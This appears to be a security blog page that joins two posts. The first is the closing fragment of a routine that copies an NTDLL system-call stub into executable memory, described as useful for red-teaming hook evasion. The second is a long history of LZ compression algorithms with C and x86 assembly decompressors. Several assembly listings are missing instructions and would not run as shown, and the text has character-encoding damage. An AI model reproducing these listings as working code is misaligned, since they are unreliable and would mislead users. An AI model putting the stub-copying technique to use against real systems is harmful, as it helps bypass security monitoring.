// resolve address of function in NTDLL

// get pointer to image directories
dir = Dirs();

// no exception directory? exit
if(rva == 0) return NULL;

ofs = rva2ofs(rva);
if(ofs == -1) return NULL;

rf = (PIMAGE_RUNTIME_FUNCTION_ENTRY)(ofs + mem);

// for each runtime function (there might be a better way??)
for(i=0; rf[i].BeginAddress != 0; i++) {
// is it our system call?
// save the end and calculate length
len = (SIZE_T) (end - start);

// allocate RWX memory
cs = VirtualAlloc(NULL, len,  MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
if(cs != NULL) {
// copy stub to memory
CopyMemory(cs, (const void*)start, len);
}
break;
}
}
// return pointer to code stub
return cs;
}
```

## Summary

Invoking system calls via remapping of the NTDLL.dll is of course the simplest approach. A lightweight LDE and CFG with no dependencies on external libraries would be useful for other Red Teaming activities like hooking API or even detecting hooked functions. It could also be used for locating GetProcAddress without touching the Export Address Table (EAT) or Import Address Table (IAT). However, GetSyscallStub demonstrates that you donβt need a disassembler just to read the code stub.

dis_syscall

odzhan

modexp

# Shellcode: Recycling Compression Algorithms for the Z80, 8088, 6502, 8086, and 68K Architectures.

Recycling Compression Algorithms for the Z80, 8088, 6502, 8086, and 68K Architectures.

## 1. Introduction

My last post about compression inadvertently missed algorithms used by the Demoscene that I attempt to correct here. Except for research by Introspec about various 8-Bit algorithms on the ZX Spectrum, itβs tricky to find information in one location about compression used in Demoscene productions. The focus here will be on variations of the Lempel-Ziv (LZ) scheme published in 1977 that are suitable for resource-constrained environments such as 8, 16, and 32-bit home computers released in the 1980s. In executable compression, we can consider LZ an umbrella term for LZ77, LZSS, LZB, LZH, LZARI, and any other algorithms inspired by those designs.

Many variations of LZ surfaced in the past thirty years, and a detailed description of them all would be quite useful for historical reference. However, the priority for this post is exploring algorithms with the best ratios that also use the least amount of code possible for decompression. Considerations include an open-source compressor and the speed of compression and decompression. However, some decoders without sources for a compressor are also useful to show the conversion between architectures.

Drop me an email, if you would like to provide feedback on this post. x86 assembly codes for some of algorithms discussed here may be found here.

## 2. History

Designing a compression format requires trade-offs, such as compression ratio, compression speed, decompression speed, code complexity, code size, memory usage, etc. For executable compression in particular, where the sum of decompression code size and compressed size is what counts, the optimal balance between these two depends on the intended target size. β Aske Simon Christensen, author of Shrinkler and co-author of Crinkler.

Since the invention of telegraphy, telephony, and especially television, engineers have sought ways to reduce the bandwidth required for transmitting electrical signals. Before the invention of analog-to-digital converters and entropy coding methods in the 1950s, compaction of television signals required reducing the quality of the video before transmission, a technique thatβs referred to as lossy compression. Many publications on compressing television signals surfaced between the 1950s-1970s, and these eventually proved to be useful in other applications, most notably for the aerospace industry.

For example, various interplanetary spacecraft launched in the 1960s could record data faster than what they could transmit to earth. And following a review of unclassified space missions in the early 1960s, in particular, the Mariner Mars mission of 1964, NASAβs Jet Propulsion Laboratory examined various compression methods for acquiring images in space. The first unclassified spacecraft to use image compression was Explorer 34 or Interplanetary Monitoring Platform 4 (IMP-4) launched in 1967. It used Chroma subsampling, invented in the 1950s specifically for color television. This method, which eventually became part of the JPEG standard, would continue being used by NASA until the invention of a more optimal encoding method called Discrete Cosine Transform (DCT)

The increase of computer mainframes in the 1950s and the collection of data on citizens for social science motivated prior research and development of lossless compression techniques. Microprocessors became inexpensive in the late 1970s, leading the way for average consumers to purchase a computer of their own. However, this didnβt immediately reduce the cost of disk storage. And the vast majority of user data remained stored on magnetic tapes or floppy diskettes rather than hard disk drives offered only as an optional component.

Hard disk drives remained expensive between 1980-2000, encouraging the development of tools to reduce the size of files. The first program to compress executables on the PC was Realia Spacemaker, which was written by Robert Dewar and published in 1982. The precise algorithm used by this program remains undocumented. However, the year of publication would suggest it uses Run-length encoding (RLE). Qkumba informed me about two things via email. First, games for the Apple II used RLE in the early 1980s for shrinking images used as title screens. Examples include Beach-Head, G.I. Joe and Black Magic, to name a few. Second, games by Infocom used Huffman-like text compression. Microsoft EXEPACK by Reuben Borman and published in 1985 also used RLE for compression.

Haruhiko Okumura uploaded an implementation of the LZSS compression algorithm to a Bulletin Board System (BBS) in 1988. Inspired by Okumura, Fabrice Bellard published LZEXE in 1989, which appears to be the first executable compressor to use LZSS.

## 3. Entropy Coding

Samuel Morse published his coding system for the electrical telegraph in 1838. It assigned short symbols for the most common letters of an alphabet, and this may be the first example of compression used for electrical signals. An entropy coder works similarly. It removes redundancy by assigning short codewords for symbols occurring more frequently and longer codewords for symbols with less frequency. The following table lists some examples.

Type Publication and Author
Shannon A Mathematical Theory of Communication published in 1948 by Claude E. Shannon.
Huffman A Method for the Construction of Minimum Redundancy Codes published in 1952 by David A. Huffman.
Arithmetic Generalized Kraft Inequality and Arithmetic Coding published in 1976 by Jorma Rissanen.
Range There are two papers of interest here. One is Source Coding Algorithms for Fast Data Compression published in 1976 by Richard Clark Pasco. The other is Range encoding: An Algorithm for Removing Redundancy from a Digitised Message published in 1979 by G.N.N. Martin.
ANS Asymmetric Numeral Systems: Entropy Coding Combining Speed of Huffman Coding with Compression Rate of Arithmetic Coding published in 2014 by JarosΕaw Duda.

Arithmetic or range coders fused with an LZ77-style compressor result in high compression ratios and compact decompressors, which makes them attractive to the demoscene. They are slower than a Huffman coder, but much more efficient. ANS is the favored coder used in mission-critical systems today, providing efficiency and speed.

## 4. Universal Code

There are many variable-length coding methods used for integers of arbitrary upper bound, and most of the algorithms presented in this post use Elias gamma coding for the offset and length of a match reference. The following table contains a list of papers referenced in Punctured Elias Codes for variable-length coding of the integers published by Peter Fenwick in 1996.

Coding Author and publication
Golomb Run-length encodings published in 1966 by Solomon W. Golomb.
Levenshtein On the redundancy and delay of separable codes for the natural numbers. published in 1968 by Vladimir I. Levenshtein.
Elias Universal Codeword Sets and Representations of the Integers published in 1975 by Peter Elias.
Rodeh-Even Economical Encoding of Commas Between Strings published in 1978 by Michael Rodeh and Shimon Even.
Rice Some Practical Universal Noiseless Coding Techniques published in 1979 by Robert F. Rice.

## 5. Lempel-Ziv (LZ77/LZ1)

Designed by Abraham Lempel and Jacob Ziv and described in A Universal Algorithm for Sequential Data Compression published in 1977. It compresses files by searching for the repetition of strings or sequences of bytes and storing a reference pointer and length to an earlier occurrence. The size of a reference pointer and length will define the overall speed of the compression and compression ratio. The following decoder uses a 12-Bit reference pointer (4096 bytes) and 4-Bit length (16 bytes). It will work with a a compressor written by Andy Herbert. However, you must change the compressor to use 16-bits for a match reference. Charles Bloom discusses small LZ decoders in a blog post that may be of interest to readers.

```uint32_t lz77_depack(
void *outbuf,
uint32_t outlen,
const void *inbuf)
{
uint32_t ofs, len;
uint8_t  *in, *out, *end, *ptr;

in  = (uint8_t*)inbuf;
out = (uint8_t*)outbuf;
end = out + outlen;

while(out < end) {
len = *(uint16_t*)in;
in += 2;
ofs = len >> 4;

// offset?
if(ofs) {
// copy reference
len = (len & 15) + 1;
ptr = out - ofs;
while(len--) *out++ = *ptr++;
}
// copy literal
*out++ = *in++;
}
// return depacked length
return (out - (uint8_t*)outbuf);
}
```

The assembly is optimized for size, currently at 54 bytes.

```lz77_depack:
_lz77_depack:

lea    esi, [esp+32+4]
lodsd
xchg   edi, eax           ; edi = outbuf
lodsd
lea    ebx, [eax+edi]     ; ebx = outlen + outbuf
lodsd
xchg   esi, eax           ; esi = inbuf
xor    eax, eax
lz77_main:
cmp    edi, ebx           ; while (out < end)
jnb    lz77_exit

lodsw                     ; ofs = *(uint16_t*)in;
movzx  ecx, al            ; len = ofs & 15;
shr    eax, 4             ; ofs >>= 4;
jz     lz77_copybyte

and    ecx, 15
inc    ecx                ; len++;
push   esi
mov    esi, edi           ; ptr = out - ofs;
sub    esi, eax
rep    movsb              ; while(len--) *out++ = *ptr++;
pop    esi
lz77_copybyte:
movsb                     ; *out++ = *src++;
jmp    lz77_main
lz77_exit:
; return (out - (uint8_t*)outbuf);
sub    edi, [esp+32+4]
mov    [esp+28], edi
ret

```

## 6. Lempel-Ziv-Storer-Szymanski (LZSS)

Designed by James Storer, Thomas Szymanski, and described in Data Compression via Textual Substitution published in 1982. The match reference in the LZ77 decoder occupies 16-bits or two bytes even when no match exists. That means for every literal are two additional redundant bytes, which isnβt very efficient. LZSS improves the LZ77 format by using one bit to distinguish between a match reference and a literal, and this improves the overall compression ratio. Introspec informed me via email the importance of this paper in describing the many variations of the original LZ77 scheme. Many of which remain unexplored. It also has an overview of the early literature, which is worth examining in more detail. Haruhiko Okumura shared his implementations of LZSS via a BBS in 1988, and this inspired the development of various executable compressors released in the late 1980s and 1990s. The following decoder works with a compressor by Sebastian Steinhauer.

```// to keep track of flags
typedef struct _lzss_ctx_t {
uint8_t w;
uint8_t *in;
} lzss_ctx;

uint8_t get_bit(lzss_ctx *c) {
uint8_t x;

x = c->w;
c->w <<= 1;

if(c->w == 0) {
x = *c->in++;
c->w = (x << 1) | 1;
}
return x >> 7;
}

uint32_t lzss_depack(
void *outbuf,
uint32_t outlen,
const void *inbuf)
{
uint8_t  *out, *end, *ptr;
uint32_t i, ofs, len;
lzss_ctx c;

// initialize pointers
out = (uint8_t*)outbuf;
end = out + outlen;

// initialize context
c.in = (uint8_t*)inbuf;
c.w  = 128;

while(out < end) {
// if bit is not set
if(!get_bit(&c)) {
// store literal
*out++ = *c.in++;
} else {
// decode offset and length
ofs = *(uint16_t*)c.in;
c.in += 2;
len = (ofs & 15) + 3;
ofs >>= 4;
ptr = out - ofs - 1;
// copy bytes
while(len--) *out++ = *ptr++;
}
}
// return length
return (out - (uint8_t*)outbuf);
}
```

The assembly is a straight forward translation of the C code, currently at 69 bytes.

```lzss_depackx:
_lzss_depackx:

lea    esi, [esp+32+4]
lodsd
xchg   edi, eax          ; edi = outbuf
lodsd
lea    ebx, [edi+eax]    ; ebx = edi + outlen
lodsd
xchg   esi, eax          ; esi = inbuf
mov    al, 128           ; set flags
lzss_main:
cmp    edi, ebx          ; while(out < end)
jnb    lzss_exit

add    al, al            ; c->w <<= 1
jnz    lzss_check_bit

lodsb                    ; c->w = *c->in++;
lzss_check_bit:

movsb                    ; *out++ = *c.in++;
jmp    lzss_main
movzx  edx, word[esi]    ; ofs = *(uint16_t*)c.in;
add    esi, 2            ; c.in += 2;
mov    ecx, edx          ; len = (ofs % LEN_SIZE) + LEN_MIN;
and    ecx, 15           ;
shr    edx, 4            ; ofs >>= 4
push   esi
lea    esi, [edi-1]      ; ptr = out - ofs - 1;
sub    esi, edx          ;
rep    movsb             ; while(len--) *out++ = *ptr++;
pop    esi
jmp    lzss_main
lzss_exit:
; return (out - (uint8_t*)outbuf);
sub    edi, [esp+32+4]
mov    [esp+28], edi
ret
```

## 7. Lempel-Ziv-Bell (LZB)

Designed by Tim Bell and described in his 1986 Ph.D. dissertation A Unifying Theory and Improvements for Existing Approaches to Text Compression. It uses a pre-processor based on LZSS and Elias gamma coding of the match length, which results in a compression ratio similar to LZH and LZARI by Okumura. However, it does not suffer the performance penalty of using Huffman or arithmetic coding. Introspec considers it to be the first implementation that uses variable-length coding for reference matches, which is the basis for most modern LZ77-style compressors.

A key exhibit in a \$300 million lawsuit brought by Stac Electronics (SE) against Microsoft was Bellβs thesis. The 1993 case centered around a disk compression utility included with MS-DOS 6.0 called DoubleSpace. SE accused Microsoft of patent violations by using the same compression technologies used in its Stacker product. The courts agreed, and SE were awarded \$120 million in compensatory damages.

## 8. Intel 8088 / 8086

For many years, bigger nerds than myself would remind me of what a mediocre architecture the x86 is and that it didnβt deserve to be the most popular CPU for personal computers. But if itβs so bad, how did it become the predominant architecture? It probably commenced in the 1970s with the release of the 8080, and an operating system designed for it by Gary Kildall called Control Program Monitor or Control Program for Microcomputers (CP/M).

Year Model Data Width (bits) Address Width (bits)
1971 4004 4 12
1972 8008 8 14
1974 4040 4 12
1974 8080 8 16
1976 8085 8 16
1978 8086 16 20
1979 8088 8 20

Kildall initially designed and developed CP/M for the 8-Bit 8080 and licensed it to run devices such as the IMSAI 8080 (seen in the movie Wargames). Kildall was motivated by the enormous potential for microcomputers to become regular home appliances. And when IBM wanted to build a microcomputer of its own in 1980, CP/M was the most successful operating system on the market.

IBM made two decisions: use the existing software and hardware for the 8085-based IBM System/23 by using the 8088 instead of the 8086. (the cost per CPU unit was also a factor); and use its product to run CP/M to remain competitive with other microcomputers on the market.

Regrettably, Kildall missed a unique opportunity to supply CP/M for the IBM Personal Computer. Instead, Bill Gates / Microsoft obtained licensing to use a cloned version of CP/M called the Quick and Dirty Operating System (QDOS). QDOS was later rebranded to 86-DOS, before being shipped with the first IBM PC as βIBM PC DOSβ. Microsoft later purchased 86-DOS, rebranded it Microsoft Disk Operating System (MS-DOS), and forced IBM into a licensing agreement so Microsoft were free to sell MS-DOS to other companies. Kildall would later remark in his unpublished memoir Computer Connections, People, Places, and Events in the Evolution of the Personal Computer Industry. that βGates is more an opportunist than a technical type and severely opinionated even when the opinion he holds is absurd.β

## 8.1 LZE

Designed by Fabrice Bellard in 1989 and included in the closed-source MS-DOS packer LZEXE by the same. Inspired by LZSS but provides a higher compression ratio. Hiroaki Goto reverse engineered this in 1995 and published an open-source implementation in 2008. The following is a 32-Bit translation of the 16-Bit decoder with some additional optimizations. Thereβs also a 68K version for anyone interested and a Z80 version by Kei Moroboshi published in 2017.

```lze_depack:
_lze_depack:
mov    edi, [esp+32+4] ; edi = out
mov    esi, [esp+32+8] ; esi = in

call   init_get_bit
lze_get_bit:
jnz    exit_get_bit

mov    dl, [esi]         ; dl = *src++;
inc    esi
rcl    dl, 1
exit_get_bit:
ret
init_get_bit:
pop    ebp
mov    dl, 128
lze_cl:
movsb
lze_main:
call   ebp               ; if(get_bit()) continue;
jc     lze_cl

call   ebp               ; if(get_bit()) {
jc     lze_copy3

xor    ecx, ecx          ; len = 0

call   ebp               ; get_bit()

call   ebp               ; get_bit()

lodsb                    ; a.b[0] = *in++;
mov    ah, -1            ; a.b[1] = 0xFF;
lze_copy1:
inc    ecx               ; len++;
jmp    lze_copy2
lze_copy3:                   ; else
lodsw
xchg   al, ah
mov    ecx, eax
shr    eax, 3            ; ofs /= 8
or     ah, 0e0h
and    ecx, 7            ; len %= 8
jnz    lze_copy1
mov    cl, [esi]         ; len = *src++;
inc    esi
; EOF?
jecxz  lze_exit          ; if(len == 0) break;
lze_copy2:
movsx  eax, ax
push   esi
lea    esi, [edi+eax]
inc    ecx
rep    movsb
pop    esi
jmp    lze_main
; return (out - (uint8_t*)outbuf);
lze_exit:
sub    edi, [esp+32+4]
mov    [esp+28], edi
ret
```

## 8.2 LZ4

Designed by Yann Collet and published in 2011. LZ4 is fast for both compression and decompression with a small decoder. Speed is somewhere between DEFLATE and LZO, while the compression ratio is similar to LZO but worse than DEFLATE. Despite the compression ratio being worse than DEFLATE, LZ4 doesnβt require a Huffman or arithmetic/range decoder. The following 32-Bit code is a conversion of the 8088/8086 implementation by Trixter. JΓΈrgen Ibsen has implemented LZ4 with optimal parsing using BriefLZ algorithms.

```lz4_depack:
_lz4_depack:
lea     esi,[esp+32+4]
xchg    eax,edi
lodsd
xchg    eax,ebx         ;BX = chunk length minus header
xchg    eax,esi
add     ebx,esi         ;BX = threshold to stop decompression
xor     ecx,ecx
@@parsetoken:               ;CX=0 here because of REP at end of loop
mul     ecx
lodsb                   ;grab token to AL
mov     dl,al           ;preserve packed token in DX
@@copyliterals:
shr     al,4            ;unpack upper 4 bits
call    buildfullcount  ;build full literal count if necessary
@@doliteralcopy:            ;src and dst might overlap so do this by bytes
rep     movsb           ;if cx=0 nothing happens
;At this point, we might be done; all LZ4 data ends with five literals and the
;offset token is ignored.  If we're at the end of our compressed chunk, stop.
cmp     esi,ebx         ;are we at the end of our compressed chunk?
@@copymatches:
lodsw                   ;AX = match offset
xchg    edx,eax         ;AX = packed token, DX = match offset
and     al,0Fh          ;unpack match length token
call    buildfullcount  ;build full match count if necessary
@@domatchcopy:
push    esi             ;ds:si saved, xchg with ax would destroy ah
mov     esi,edi
sub     esi,edx
;Can't use MOVSWx2 because [es:di+1] is unknown
rep     movsb           ;copy match run if any left
pop     esi
jmp     @@parsetoken
buildfullcount:
;CH has to be 0 here to ensure AH remains 0
cmp     al,0Fh          ;test if unpacked literal length token is 15?
xchg    ecx,eax         ;CX = unpacked literal length token; flags unchanged
jne     builddone       ;if AL was not 15, we have nothing to build
buildloop:
cmp     al,0FFh         ;was it FF?
je      buildloop       ;if so, keep going
builddone:
ret
done:
sub     edi,[esp+32+4];subtract original offset from where we are now
mov     [esp+28], edi
ret
```

## 8.3 LZSA

Designed by Emmanuel Marty with participation from Introspec and published in 2018. Introspec explains the difference between the two formats, LZSA1 and LZSA2.

LZSA1 is designed to directly compete with LZ4. If you compress using βlzsa -f1 -r INPUT OUTPUTβ, you are very likely to get higher compression ratio than LZ4 and probably slightly lower decompression speed compared to LZ4 (I am comparing speeds of LZSA1 fast decompressor and LZ4 fast decompressor, both hand-tuned by myself). If you really want to compete with LZ4 on speed, you need to compress using one of the βboostβ options βlzsa -f1 -r -m4 INPUT OUTPUTβ (better ratio, similar speed to LZ4) or βlzsa -f1 -r -m5 INPUT OUTPUTβ (similar ratio, faster decompression than LZ4).

LZSA2 is approximately in the same league as BitBuster or ZX7. Itβs likely to be worse if youβre compressing pure graphics (at least this is what we are seeing on ZX Spectrum), but it has much larger window and is pretty decent at compressing mixed data (e.g. a complete game binary or something similar). We accepted that the compression ratio is not the best because we wanted to preserve some of its speed. You should expect LZSA2 to decompress data about 50% faster than best I can do for ZX7. I did not do tests on BitBuster, but I just had a look at decompressor for ver.1.2 and there is no way it can compete with LZSA2 on speed.

```lzsa1_decompress:
_lzsa1_decompress:

mov    edi, [esp+32+4]    ; edi = outbuf
mov    esi, [esp+32+8]    ; esi = inbuf

xor    ecx, ecx
.decode_token:
mul    ecx
lodsb                     ; read token byte: O|LLL|MMMM
mov    dl, al             ; keep token in dl

and    al, 070H           ; isolate literals length in token (LLL)
shr    al, 4              ; shift literals length into place

cmp    al, 07H            ; LITERALS_RUN_LEN?
jne    .got_literals      ; no, we have the full literals count from the token, go copy

lodsb                     ; grab extra length byte
jnc    .got_literals      ; if no overflow, we have the full literals count, go copy
jne    .mid_literals

lodsw                     ; grab 16-bit extra length
jmp    .got_literals

.mid_literals:
lodsb                     ; grab single extra length byte

.got_literals:
xchg   ecx, eax
rep    movsb              ; copy cx literals from ds:si to es:di

test   dl, dl             ; check match offset size in token (O bit)
js     .get_long_offset

dec     ecx
xchg    eax, ecx          ; clear ah - cx is zero from the rep movsb above
lodsb
jmp     .get_match_length

.get_long_offset:
lodsw                     ; Get 2-byte match offset

.get_match_length:
xchg    eax, edx          ; edx: match offset  eax: original token
and     al, 0FH           ; isolate match length in token (MMMM)

cmp     al, 012H          ; MATCH_RUN_LEN?
jne     .got_matchlen     ; no, we have the full match length from the token, go copy

lodsb                     ; grab extra length byte
jnc     .got_matchlen     ; if no overflow, we have the entire length
jne     .mid_matchlen

lodsw                     ; grab 16-bit length
test    eax, eax          ; bail if we hit EOD
je      .done_decompressing
jmp     .got_matchlen

.mid_matchlen:
lodsb                     ; grab single extra length byte

.got_matchlen:
xchg    ecx, eax          ; copy match length into ecx
xchg    esi, eax
mov     esi, edi          ; esi now points at back reference in output data
movsx   edx, dx           ; sign-extend dx to 32-bits.
rep     movsb             ; copy match
xchg    esi, eax          ; restore esi
jmp     .decode_token     ; go decode another token

.done_decompressing:
sub    edi, [esp+32+4]
mov    [esp+28], edi      ; eax = decompressed size
ret                       ; done
```

## 8.4 aPLib

Designed by JΓΈrgen Ibsen and published in 1998, it continues to remain a closed-source compressor. Fortunately, an open-source version of the compressor called aPUltra is available, which was released by Emmanuel Marty in 2019. The small compressor in x86 assembly follows.

```apl_decompress:
_apl_decompress:

%ifdef CDECL
mov    esi, [esp+32+4]  ; esi = aPLib compressed data
mov    edi, [esp+32+8]  ; edi = output
%endif

; === register map ===
;  al: bit queue
;  ah: unused, but value is trashed
; ebx: follows_literal
; ecx: scratch register for reading gamma2 codes and storing copy length
; edx: match offset (and rep-offset)
; esi: input (compressed data) pointer
; edi: output (decompressed data) pointer
; ebp: offset of .get_bit

mov     al,080H         ; clear bit queue(al) and set high bit to move into carry
xor     edx, edx        ; invalidate rep offset in edx

call    .init_get_bit
.get_dibits:
call    ebp             ; read data bit
adc     ecx,ecx         ; shift into cx
.get_bit:
add     al,al           ; shift bit queue, and high bit into carry
jnz     .got_bit        ; queue not empty, bits remain
lodsb                   ; read 8 new bits
adc     al,al           ; shift bit queue, and high bit into carry
.got_bit:
ret
.init_get_bit:
pop     ebp             ; load offset of .get_bit, to be used with call ebp
.literal:
movsb                   ; read and write literal byte
.next_command_after_literal:
push    03H
pop     ebx             ; set follows_literal(bx) to 3

.next_command:
call    ebp             ; read 'literal or match' bit
jnc     .literal        ; if 0: literal

; 1x: match
call    ebp             ; read '8+n bits or other type' bit
jc      .other          ; 11x: other type of match
; 10: 8+n bits match
call    .get_gamma2     ; read gamma2-coded high offset bits
sub     ecx,ebx         ; high offset bits == 2 when follows_literal == 3 ?
; (a gamma2 value is always >= 2, so substracting follows_literal when it
; is == 2 will never result in a negative value)
jae     .not_repmatch   ; if not, not a rep-match
call    .get_gamma2     ; read match length
jmp     .got_len        ; go copy
.not_repmatch:
mov     edx,ecx         ; transfer high offset bits to dh
shl     edx,8
mov     dl,[esi]        ; read low offset byte in dl
inc     esi
call    .get_gamma2     ; read match length
cmp     edx,7D00H       ; offset >= 32000 ?
jae     .increase_len_by2 ; if so, increase match len by 2
cmp     edx,0500H       ; offset >= 1280 ?
jae     .increase_len_by1 ; if so, increase match len by 1
cmp     edx,0080H       ; offset < 128 ?
jae     .got_len        ; if so, increase match len by 2, otherwise it would be a 7+1 copy
.increase_len_by2:
inc     ecx             ; increase length
.increase_len_by1:
inc     ecx             ; increase length
; copy ecx bytes from match offset edx
.got_len:
push    esi             ; save esi (current pointer to compressed data)
mov     esi,edi         ; point to destination in edi - offset in edx
sub     esi,edx
rep     movsb           ; copy matched bytes
pop     esi             ; restore esi
mov     bl,02H          ; set follows_literal to 2 (ebx is unmodified by match commands)
jmp     .next_command
; read gamma2-coded value into ecx
.get_gamma2:
xor     ecx,ecx         ; initialize to 1 so that value will start at 2
inc     ecx             ; when shifted left in the adc below
.gamma2_loop:
call    .get_dibits     ; read data bit, shift into cx, read continuation bit
jc      .gamma2_loop    ; loop until a zero continuation bit is read
ret
; handle 7 bits offset + 1 bit len or 4 bits offset / 1 byte copy
.other:
xor     ecx,ecx
call    ebp             ; read '7+1 match or short literal' bit
jc      .short_literal  ; 111: 4 bit offset for 1-byte copy
; 110: 7 bits offset + 1 bit length

movzx   edx,byte[esi]   ; read offset + length in dl
inc     esi
inc     ecx             ; prepare cx for length below
shr     dl,1            ; shift len bit into carry, and offset in place
je      .done           ; if zero offset: EOD
adc     ecx,ecx         ; len in cx: 1*2 + carry bit = 2 or 3
jmp     .got_len
; 4 bits offset / 1 byte copy
.short_literal:
call    .get_dibits     ; read 2 offset bits
call    .get_dibits     ; read 2 offset bits
xchg    eax,ecx         ; preserve bit queue in cx, put offset in ax
jz      .write_zero     ; if offset is 0, write a zero byte
; short offset 1-15
mov     ebx,edi         ; point to destination in es:di - offset in ax
sub     ebx,eax         ; we trash bx, it will be reset to 3 when we loop
mov     al,[ebx]        ; read byte from short offset
.write_zero:
stosb                   ; copy matched byte
xchg    eax,ecx         ; restore bit queue in al
jmp     .next_command_after_literal
.done:
sub     edi, [esp+32+8] ; compute decompressed size
mov     [esp+28], edi
ret
```

## 9. MOS Technology 6502

This 8-Bit CPU was the product of Motorola management, ignoring customer concerns about the cost of the 6800 CPU launched by the company in 1974. Following consultations with potential customers for the 6800. Chuck Peddle tried to convince Motorola to develop a low-cost alternative for consumers on a limited budget.

Motorola ordered Peddle to cease working on this idea, which resulted in his departure from the company with several other employees that began working on the 6502 at MOS Technology. Used in the Commodore 64, the Apple II, and the BBC Micro home computers, including various gaming consoles, Motorola acknowledged missing a golden opportunity. The company would later express regret for dismissing Peddleβs idea since the 6502 was far more successful than the 6800.

Trivia: The Terminator movie from 1984 uses CPU instructions from the 6502.

Those of you that want to program a Commodore 64 without purchasing one can always use an emulator like VICE. For the Apple II, thereβs AppleWin. (Yes, Windows only). Since Qkumba already implemented several popular depackers for 6502, I requested a translation of the Exomizer compression algorithm. Using this translation, I created the following table, which lists 6502 instructions and their equivalent for x86. The EBX and ECX registers replace the X and Y registers, respectively. Using #\$80 as an immediate value is simply for demonstration, and youβll find a full list of instructions here.

6502 x86 Description
lda #\$80 mov al, 0x80 Load byte into accumulator.
cmp #\$80 cmp al, 0x80 Compare byte with accumulator.
cpx #\$80 cmp bl, 0x80 Compare byte with X.
cpy #\$80 cmp cl, 0x80 Compare byte with Y.
asl shl al, 1 ASL shifts all bits left one position. 0 is shifted into bit 0 and the original bit 7 is shifted into the Carry.
lsr shr al, 1 Logical shift right.
bit #\$7 test al, 7 Perform a bitwise AND, set the flags and discard the result.
sec stc SEt the Carry flag.
sbc #\$1 sbb al, 1 Subtract byte with Carry.
rts ret Return from subroutine.
eor #\$80 xor al, 0x80 Perform an exclusive OR.
ora #\$80 or al, 0x80 Perform a bitwise OR.
and #\$80 and al, 0x80 Bitwise AND with accumulator
rol rcl al, 1 Shifts all bits left one position. The Carry is shifted into bit 0 and the original bit 7 is shifted into the Carry.
ror rcr al, 1 Shifts all bits right one position. The Carry is shifted into bit 7 and the original bit 0 is shifted into the Carry.
bpl jns Branch on PLus. Jump if Not Signed.
bmi js Branch on MInus. Jump if Signed.
bcc:bcs jnc:jc Branch on Carry Clear. Branch on Carry Set.
bne:beq jne:je Branch on Not Equal. Branch on EQual.
bvc:bvs jno:jo Branch on oVerflow Clear. Branch on oVerflow Set.
php pushf PusH Processor status.
plp popf PuLl Processor status.
pha push eax PusH Accumulator.
pla pop eax PuLl Accumulator.
tax movzx ebx, al / mov bl, al Transfer A to X.
tay movzx ecx, al / mov cl, al Transfer A to Y.
txa mov al, bl Transfer X to A.
tya mov al, cl Transfer Y to A.
inx inc ebx / inc bl INcrement X.
iny inc ecx / inc cl INcrement Y.
dex dec ebx / dec bl DEcrement X.
dey dec ecx / dec cl DEcrement Y.

## 9.1 Exomizer

Designed by Magnus Lind and published in 2002. Exomizer is popular for devices such as the Commodore VIC20, the C64, the C16/plus4, the C128, the PET 4032, the Atari 400/800 XL/XE, the Apple II+e, the Oric-1, the Oric Atmos, and the BBC Micro B. It inspired the development of other executable compressors, most notably PackFire. Qkumba was kind enough to provide a translation of the Exomizer 3 decoder translated from 6502 to x86. However, due to the complexity of the source code, only a snippet of code is shown here. The Y register maps to the EDI register while the X register maps to the ESI register.

```%MACRO mac_get_bits 0
call get_bits                   ;jsr get_bits
%ENDM
get_bits:
pushfd
shl  al, 1                      ;asl
lahf
jns  gb_skip                    ;bpl gb_skip
gb_next:
shl  byte [zp_bitbuf], 1        ;asl zp_bitbuf
jne  gb_ok                      ;bne gb_ok
mac_refill_bits                 ;+mac_refill_bits
gb_ok:
rcl  al, 1                      ;rol
lahf
test al, al
js   gb_next                    ;bmi gb_next
gb_skip:
popfd
sahf
jo   gb_get_hi                  ;bvs gb_get_hi
ret                             ;rts
gb_get_hi:
stc                             ;sec
mov  [zp_bits_hi], al           ;sta zp_bits_hi
jmp  get_crunched_byte          ;jmp get_crunched_byte
%ENDIF
; -------------------------------------------------------------------
; calculate tables (62 bytes) + get_bits macro
; x and y must be #0 when entering
;
clc                             ;clc
table_gen:
movzx esi, al                   ;tax
mov   eax, edi                  ;tya
and   al, 0x0f                  ;and #\$0f
mov   [edi + tabl_lo], al       ;sta tabl_lo,y
je    shortcut                  ;beq shortcut            ; start a new sequence
; -------------------------------------------------------------------
mov   eax, esi                  ;txa
mov   [edi + tabl_lo], al       ;sta tabl_lo,y
mov   al, [zp_len_hi]           ;lda zp_len_hi
shortcut:
mov   [edi + tabl_hi], al       ;sta tabl_hi,y
; -------------------------------------------------------------------
mov   al, 0x01                  ;lda #\$01
mov   [zp_len_hi], al           ;sta <zp_len_hi
mov   al, 0x78                  ;lda #\$78                ; %01111000
mac_get_bits                    ;+mac_get_bits
; -------------------------------------------------------------------
shr   al, 1                     ;lsr
movzx esi, al                   ;tax
je    rolled                    ;beq rolled
pushfd                          ;php
rolle:
shl  byte [zp_len_hi],1         ;asl zp_len_hi
stc                             ;sec
rcr  al, 1                      ;ror
dec  esi                        ;dex
jne  rolle                      ;bne rolle
popfd                           ;plp
rolled:
rcr  al, 1                      ;ror
mov  [edi + tabl_bi], al        ;sta tabl_bi,y
test al, al
js   no_fixup_lohi              ;bmi no_fixup_lohi
mov  al, [zp_len_hi]            ;lda zp_len_hi
mov  ebx, esi
mov  [zp_len_hi], bl            ;stx zp_len_hi
jmp  skip_fix                   ;!BYTE \$24
no_fixup_lohi:
mov  eax, esi                   ;txa
; -------------------------------------------------------------------
skip_fix:
inc  edi                        ;iny
cmp  edi, encoded_entries       ;cpy #encoded_entries
jne  table_gen                  ;bne table_gen
```

## 9.2 Pucrunch

Designed by Pasi Ojala and published in 1997. Itβs described by the author as a Hybrid LZ77 and RLE compressor, using Elias gamma coding for reference length, and a mixture of gamma and linear code for the offset. It requires no additional memory for decompression. The description and source code are well worth a read for those of you that want to understand the characteristics of other LZ77-style compressors.

## 10. Zilog 80

I was able to design whatever I wanted. And personally I wanted to develop the best and the most wonderful 8-Bit microprocessor in the world. β Masatoshi Shima

